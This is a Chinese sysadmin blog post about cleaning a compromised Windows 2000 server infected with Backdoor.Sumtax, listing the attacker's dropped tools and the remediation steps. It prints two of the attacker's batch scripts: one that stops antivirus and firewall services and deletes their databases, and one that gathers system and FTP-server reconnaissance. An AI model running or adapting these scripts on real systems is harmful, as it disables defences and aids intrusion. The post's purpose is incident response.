一早来开机就发现Host Monitor报告Web Server出问题了,SQL Server No Answer,远程到此机器,AVG的定时扫描报告说C:/WINNT/SYSTEM32/SPOOL/下HELP中的Secure.bat有病毒,顺着检查发现C:/WINNT/SYSTEM32/SPOOL/下比平时多了一个Help的隐藏目录,于是学警察BaiBai用ALT+Print Screen对现场做了个快照,然后将Help目录打包下来,将目录删除,并将此次事件写入系统运维记录,遗憾的是引子Secure.bat给我第一时间删除了,以后发现问题得先保留现场再处理。
分析一下Help的内容(如下),基本上以收集信息为主,再加上一个Telsrv的程序,充分体现了孙子兵法里面知己知彼,百战不殆的精神:
AV_FW.bat,用来停止各种Anti Virus以及防火墙如BackICE的服务,并且最后还删除了历史扫描记录和病毒数据库文件;
Fport.exe,用来收集端口信息,包括守护在端口的进程,并将收集的结果保存到Fport.txt中;
regedit.exe,注册表编辑器;
kill.exe,PsKill v1.03 - local and remote process killer;
system.bat,报告系统信息,以及找到Serv-U信息,并将结果保存到Systeminfo.txt中;
telsrv.exe,一个Telnet Server,http://www.pcmicro.com/netfoss/telsrv.html;
由于这台服务器是自己接手的,是一台All in One的服务器,于是一步一步来:
※根据Secure.bat在Google上找到了Symantec一个有关Backdoor.Sumtax的安全公告:http://securityresponse.symantec.com/avcenter/venc/data/backdoor.sumtax.html,按照说明检查了相关的地方,并清理了注册表;
※重新检查服务,将不需要的服务都关闭了(也纳闷怎么开了那么多乱七八糟的服务);
※使用%SystemRoot%/system32/wupdmgr.exe到微软站点打足补丁;
※重新修改了SQL Server的SA密码,将本地Administrator改名,同时也修改密码,并写入服务器运维报告;
※将可疑的进程都Kill掉,并且查看以下的键值,将可疑的进程都砍掉;
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/RunOnce
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Runonce
AV_FW.bat的内容:
net stop _Avp32.exe /y << av_fw.txt
net stop _Avpcc.exe /y << av_fw.txt
net stop _Avpm.exe /y << av_fw.txt
net stop Ackwin32.exe /y << av_fw.txt
net stop Agnitum Outpost Firewall /y << av_fw.txt
net stop Anti-Trojan.exe /y << av_fw.txt
net stop ANTIVIR /y << av_fw.txt
......
net stop AVCONSOL /y << av_fw.txt
net stop WEBTRAP /y << av_fw.txt
net stop POP3TRAP /y << av_fw.txt
del c:/*ANTI-VIR*.DAT /s /q << av_fw.txt
del c:/*CHKLIST*.DAT /s /q << av_fw.txt
del c:/*CHKLIST*.MS /s /q << av_fw.txt
del c:/*CHKLIST*.CPS /s /q << av_fw.txt
del c:/*CHKLIST*.TAV /s /q v
......
system.bat的内容:
@echo off
echo System Information: < Systeminfo.txt
echo. << Systeminfo.txt
echo. << Systeminfo.txt
echo. << Systeminfo.txt
echo. << Systeminfo.txt
#OPERATING SYSTEM
echo ___________________ << Systeminfo.txt
echo Operating System... << Systeminfo.txt
echo ?<< Systeminfo.txt
VER << Systeminfo.txt
#FREE SPACE
echo _____________ << Systeminfo.txt
echo Free Space... << Systeminfo.txt
echo ?<< Systeminfo.txt
dir c: | find "bytes" << Systeminfo.txt
dir c: | find "libres" << Systeminfo.txt
dir d: | find "bytes" << Systeminfo.txt
dir d: | find "libres" << Systeminfo.txt
dir e: | find "bytes" << Systeminfo.txt
dir e: | find "libres" << Systeminfo.txt
dir f: | find "bytes" << Systeminfo.txt
dir f: | find "libres" << Systeminfo.txt
dir g: | find "bytes" << Systeminfo.txt
dir g: | find "libres" << Systeminfo.txt
dir h: | find "bytes" << Systeminfo.txt
dir h: | find "libres" << Systeminfo.txt
#FINDING SERVU
echo ________________ << Systeminfo.txt
echo Finding Servu... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/Ser*.ini << Systeminfo.txt
Dir /s /a d:/Ser*.ini << Systeminfo.txt
Dir /s /a e:/Ser*.ini << Systeminfo.txt
Dir /s /a c:/Ser*.exe << Systeminfo.txt
Dir /s /a d:/Ser*.exe << Systeminfo.txt
Dir /s /a e:/Ser*.exe << Systeminfo.txt
#FINDING rar
echo ________________ << Systeminfo.txt
echo Finding RAR.. << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/*.rar << Systeminfo.txt
Dir /s /a d:/*.rar << Systeminfo.txt
Dir /s /a e:/*.rar << Systeminfo.txt
Dir /s /a f:/*.rar << Systeminfo.txt
Dir /s /a g:/*.rar << Systeminfo.txt
Dir /s /a h:/*.rar << Systeminfo.txt
#FINDING mp3
echo ________________ << Systeminfo.txt
echo Finding MP3... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/*.mp3 << Systeminfo.txt
Dir /s /a d:/*.mp3 << Systeminfo.txt
Dir /s /a e:/*.mp3 << Systeminfo.txt
Dir /s /a f:/*.mp3 << Systeminfo.txt
Dir /s /a g:/*.mp3 << Systeminfo.txt
Dir /s /a h:/*.mp3 << Systeminfo.txt
#FINDING nfo
echo ________________ << Systeminfo.txt
echo Finding NFO... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/*.nfo << Systeminfo.txt
Dir /s /a d:/*.nfo << Systeminfo.txt
Dir /s /a e:/*.nfo << Systeminfo.txt
Dir /s /a f:/*.nfo << Systeminfo.txt
Dir /s /a g:/*.nfo << Systeminfo.txt
Dir /s /a h:/*.nfo << Systeminfo.txt
#FINDING FTP.EXE
echo ________________ << Systeminfo.txt
echo Finding FTP... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/FTP.EXE << Systeminfo.txt
Dir /s /a d:/FTP.EXE << Systeminfo.txt
Dir /s /a e:/FTP.EXE << Systeminfo.txt
Dir /s /a f:/FTP.EXE << Systeminfo.txt
Dir /s /a g:/FTP.EXE << Systeminfo.txt
Dir /s /a h:/FTP.EXE << Systeminfo.txt
#FINDING TFTP.EXE
echo ________________ << Systeminfo.txt
echo Finding TFTP... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/TFTP.EXE << Systeminfo.txt
Dir /s /a d:/TFTP.EXE << Systeminfo.txt
Dir /s /a e:/TFTP.EXE << Systeminfo.txt
Dir /s /a f:/TFTP.EXE << Systeminfo.txt
Dir /s /a g:/TFTP.EXE << Systeminfo.txt
Dir /s /a h:/TFTP.EXE << Systeminfo.txt
#FINDING FIREDAEMON.EXE
echo ________________ << Systeminfo.txt
echo Finding Firedaemon... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a d:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a e:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a f:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a g:/FIREDAEMON.EXE << Systeminfo.txt
Dir /s /a h:/FIREDAEMON.EXE << Systeminfo.txt
#FINDING IOFTPD
echo ________________ << Systeminfo.txt
echo Finding Ioftpd... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/io*.ini << Systeminfo.txt
Dir /s /a d:/io*.ini << Systeminfo.txt
Dir /s /a c:/io*.exe << Systeminfo.txt
Dir /s /a d:/io*.exe << Systeminfo.txt
Dir /s /a c:/rai*.ini << Systeminfo.txt
Dir /s /a d:/rai*.ini << Systeminfo.txt
Dir /s /a c:/rai*.exe << Systeminfo.txt
Dir /s /a d:/rai*.exe << Systeminfo.txt
#FINDING Sub0t.ini
echo ________________ << Systeminfo.txt
echo Finding Sub0t.ini... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/Sub0t.ini << Systeminfo.txt
Dir /s /a d:/Sub0t.ini << Systeminfo.txt
Dir /s /a e:/Sub0t.ini << Systeminfo.txt
Dir /s /a c:/svrany.exe << Systeminfo.txt
Dir /s /a d:/svrany.exe << Systeminfo.txt
#FINDING ftpc.exe
echo ________________ << Systeminfo.txt
echo Finding ftpc.exe... << Systeminfo.txt
echo << Systeminfo.txt
Dir /s /a c:/ftpc.exe << Systeminfo.txt
Dir /s /a d:/ftpc.exe << Systeminfo.txt
Dir /s /a e:/ftpc.exe << Systeminfo.txt
Dir /s /a f:/ftpc.exe << Systeminfo.txt
Dir /s /a g:/ftpc.exe << Systeminfo.txt
Dir /s /a h:/ftpc.exe << Systeminfo.txt
#RUNNING SERVICES
echo ___________________ << Systeminfo.txt
echo Running Services... << Systeminfo.txt
echo ?<< Systeminfo.txt
NET START << Systeminfo.txt
#RUNNING SERVICES
echo ______ << Systeminfo.txt
echo SET... << Systeminfo.txt
echo << Systeminfo.txt
SET << Systeminfo.txt
#INSTALLED SOFTWARE
echo _____________________ << Systeminfo.txt
echo Installed Software... << Systeminfo.txt
echo ?<< Systeminfo.txt
Start /Wait Regedit /E %TEMP%./Tmp HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Uninstall
Find "DisplayName" > %TEMP%./Tmp | Find /V "QuietDisplayName" << Systeminfo.txt
Del %TEMP%./Tmp
#INSTALLED SOFTWARE
echo ___________ << Systeminfo.txt
echo NET STAT... << Systeminfo.txt
echo ?<< Systeminfo.txt
NETSTAT << Systeminfo.txt
#RUNNING PROCESSES
echo ____________________ << Systeminfo.txt
echo Running Processes... << Systeminfo.txt
echo << Systeminfo.txt
TASKLIST /SVC << Systeminfo.txt
#SYSTEM INFO
echo ______________ << Systeminfo.txt
echo System Info... << Systeminfo.txt
echo << Systeminfo.txt
echo. << Systeminfo.txt
echo. << Systeminfo.txt
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=242180
1544
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
